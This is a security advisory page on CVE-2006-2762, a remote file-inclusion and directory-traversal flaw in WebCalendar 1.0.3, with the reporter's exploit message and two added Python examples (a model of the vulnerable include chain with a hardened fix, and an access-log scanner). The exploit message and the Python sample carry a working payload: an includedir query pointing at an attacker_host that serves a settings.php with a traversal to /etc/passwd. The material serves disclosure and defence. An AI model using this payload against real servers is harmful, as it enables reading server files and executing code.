SecurityTracker.com
SecurityTracker Archives


 
Category:  Application (Calendar)  >  WebCalendar
Vendors:  Knudsen, Craig
WebCalendar Include File Bug in 'includes/config.php' Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1016179
SecurityTracker URL:  http://securitytracker.com/id?1016179
CVE Reference:  CVE-2006-2762
Updated:  Aug 25 2009
Original Entry Date:  May 30 2006
Impact:  Disclosure of system information, Disclosure of user information
Exploit Included:  Yes
Version(s): 1.0.3
Description:  A vulnerability was reported in WebCalendar. A remote user can cause the target system to include, and thereby read, arbitrary local files.

The 'includes/config.php' script uses the 'includedir' variable without validating it. With register_globals enabled, a remote user can set 'includedir' from the query string (for example to an http:// URL). config.php then opens "$includedir/settings.php" with fopen() and, when allow_url_fopen is also enabled (the PHP default at the time), fetches that file from the attacker's server. The 'user_inc' value parsed out of the fetched settings.php is later passed to include_once() in 'includes/init.php' with no path check, so a directory-traversal value such as '../../../../etc/passwd' makes the target include any file the web server can read and return its contents. Because the file is included rather than merely read, any PHP code it contains is executed.

Impact:  A remote user can view files on the target system with the privileges of the target web service.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.k5n.us/webcalendar.php
Cause:  Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Reported By:  socsam@linuxmail.org
Message History:   None.
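The include chain above, modelled as an added Python example (it is not WebCalendar's code and not part of the original advisory). The install path INCLUDES_DIR, the 'key: value' regex, the allow-list ALLOWED_USER_INC and the function names are assumptions, and the two settings.php bodies are constructed samples. It shows what the 1.0.3 logic resolves a hostile settings.php to, beside a hardened lookup that pins the config location server-side and refuses any user_inc that is not an allow-listed bare file name inside the includes directory:

```python
import posixpath
import re

# Assumed install location; the real one is whatever the site uses.
INCLUDES_DIR = "/var/www/webcalendar/includes"

# Constructed sample: the settings.php body the attacker's server returns
# (the inner text that the advisory's PHP wrapper echoes).  Lines that are
# not "key: value" pairs are ignored by the parser, as in the advisory.
MALICIOUS_SETTINGS = """\
# updated via install/index.php on Wed, 24 May 2006 09:29:55 +0300
Unimportant variables can be taken from original settings.php
db_type: mysql
user_inc: ../../../../../../../../../../../../../../../../etc/passwd
# end settings.php
"""

# Constructed sample: what a legitimate local settings.php would carry.
BENIGN_SETTINGS = """\
db_type: mysql
user_inc: user.php
"""

# Assumed "key: value" line syntax; the page elides WebCalendar's own regex.
SETTING_RE = re.compile(r"^\s*([A-Za-z_][A-Za-z0-9_]*)\s*:\s*(.*?)\s*$")

# Assumed allow-list of user back-end files; adjust to what includes/ ships.
ALLOWED_USER_INC = {"user.php", "user-ldap.php"}


def select_includedir_register_globals(request_params):
    """Model of config.php under register_globals=On: a query-string
    'includedir' becomes $includedir, so the client chooses where
    settings.php is fetched from (a remote URL if allow_url_fopen is On)."""
    return request_params.get("includedir") or INCLUDES_DIR


def select_includedir_hardened(request_params):
    """Hardened: the config location is a server-side constant; the
    request is never consulted."""
    return INCLUDES_DIR


def parse_settings(text):
    """Model of the config.php loop: split on newlines, keep key/value
    pairs, skip comments and lines that do not match."""
    settings = {}
    for line in text.split("\n"):
        if line.lstrip().startswith("#"):
            continue
        m = SETTING_RE.match(line)
        if m:
            settings[m.group(1)] = m.group(2)
    return settings


def user_inc_path_vulnerable(settings):
    """Model of init.php in 1.0.3: include_once "includes/$user_inc" with
    no check, so '..' segments walk out of the includes directory."""
    return posixpath.normpath(
        posixpath.join(INCLUDES_DIR, settings.get("user_inc", "")))


def user_inc_path_hardened(settings):
    """Hardened lookup: the value must be an allow-listed bare file name and
    the normalised path must still sit directly under INCLUDES_DIR."""
    name = settings.get("user_inc", "user.php")
    if name not in ALLOWED_USER_INC:
        raise ValueError("user_inc not allow-listed: %r" % name)
    path = posixpath.normpath(posixpath.join(INCLUDES_DIR, name))
    if posixpath.dirname(path) != INCLUDES_DIR:
        raise ValueError("user_inc escapes includes directory: %r" % path)
    return path


if __name__ == "__main__":
    # Exploit flow from the advisory: index.php?includedir=http://attacker_host
    where = select_includedir_register_globals({"includedir": "http://attacker_host"})
    print("settings.php fetched from:", where)
    bad = parse_settings(MALICIOUS_SETTINGS)
    print("vulnerable include resolves to:", user_inc_path_vulnerable(bad))
    try:
        user_inc_path_hardened(bad)
    except ValueError as exc:
        print("hardened lookup rejects it:", exc)
    print("hardened lookup on benign config:",
          user_inc_path_hardened(parse_settings(BENIGN_SETTINGS)))
```

The allow-list is the decisive check; the dirname comparison is a second line of defence for the day someone extends the list with a value that itself contains a path separator. Note that normpath() clamps the sixteen '..' segments at the filesystem root, which is exactly why the attacker in the advisory does not need to know the install depth.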


 Source Message Contents

Date:  Tue, 30 May 2006 18:31:12 +0000
From:  socsam@linuxmail.org
Subject:  WebCalendar-1.0.3 reading of any files

Version:    WebCalendar-1.0.3

Type:       Reading of any files

Description:
-----------------------------

includes/config.php, line 64:

if ( ! empty ( $includedir ) )
  $fd = @fopen ( "$includedir/settings.php", "rb", true );
......
while ( ! feof ( $fd ) ) {
  $data .= fgets ( $fd, 4096 );

$configLines = explode ( "\n", $data );

for ( $n = 0; $n < count ( $configLines ); $n++ ) {
......
    $settings[$matches[1]] = $matches[2];
......

$user_inc = $settings['user_inc'];
......

includes/init.php:

include_once "includes/$user_inc";

Example:
---------------------------------------

index.php?includedir=http://attacker_host

where a file settings.php exists on attacker_host with the following content:

<?php
    echo '<?php
# updated via install/index.php on Wed, 24 May 2006 09:29:55 +0300
Unimportant variables can be taken from original settings.php
user_inc: ../../../../../../../../../../../../../../../../etc/passwd
# end settings.php
?>';
?>

Requirements:

register_globals = On;
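Added example, not part of the original message or of WebCalendar: a small Python scanner for this exploit pattern in web-server access logs. No legitimate WebCalendar request carries an includedir parameter, so any occurrence is worth a record, and a value with a URL scheme or '..' segments is the pattern from the message above. The log lines, addresses and the attacker_host name are constructed samples; the log regex and function names are assumptions of this example:

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache-style access-log lines (sample data, not a real capture).
SAMPLE_LOG = [
    '203.0.113.7 - - [30/May/2006:18:31:12 +0000] "GET /webcalendar/index.php?includedir=http://attacker_host HTTP/1.0" 200 5123',
    '198.51.100.2 - - [30/May/2006:18:32:05 +0000] "GET /webcalendar/index.php?date=20060530 HTTP/1.1" 200 8012',
    '203.0.113.7 - - [30/May/2006:18:33:40 +0000] "GET /webcalendar/index.php?includedir=h%74tp%3A%2F%2Fattacker_host HTTP/1.0" 200 5123',
    '203.0.113.9 - - [30/May/2006:18:35:01 +0000] "GET /webcalendar/month.php?includedir=../../../../tmp HTTP/1.1" 500 412',
]

# Assumed log layout: client, ident, user, [timestamp], "METHOD target PROTO".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"'
)
# Any URL scheme (http://, ftp://, php://, ...) in includedir means the
# settings.php fetch is pointed at a remote host or a stream wrapper.
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.IGNORECASE)


def classify_includedir(value):
    """Label one includedir value.  parse_qs has already decoded it once;
    the extra unquote() catches double-encoded payloads."""
    v = unquote(value)
    if SCHEME_RE.match(v):
        return "remote-url"
    if ".." in v.replace("\\", "/").split("/"):
        return "traversal"
    # config.php never expects this name from the request, so even a plain
    # local path is abnormal and gets reported.
    return "unexpected-parameter"


def scan_access_log(lines):
    """Return one record per request that carries an includedir parameter."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        params = parse_qs(query, keep_blank_values=True)
        for value in params.get("includedir", []):
            hits.append({
                "ip": m.group("ip"),
                "time": m.group("ts"),
                "value": value,
                "reason": classify_includedir(value),
            })
    return hits


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print("%(time)s %(ip)s includedir=%(value)r -> %(reason)s" % hit)
```

Matching on the decoded parameter rather than on the raw request line is what makes the percent-encoded third request show up as the same thing as the first; a string match on "includedir=http" would miss it.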

 



Copyright 2007, SecurityGlobal.net LLC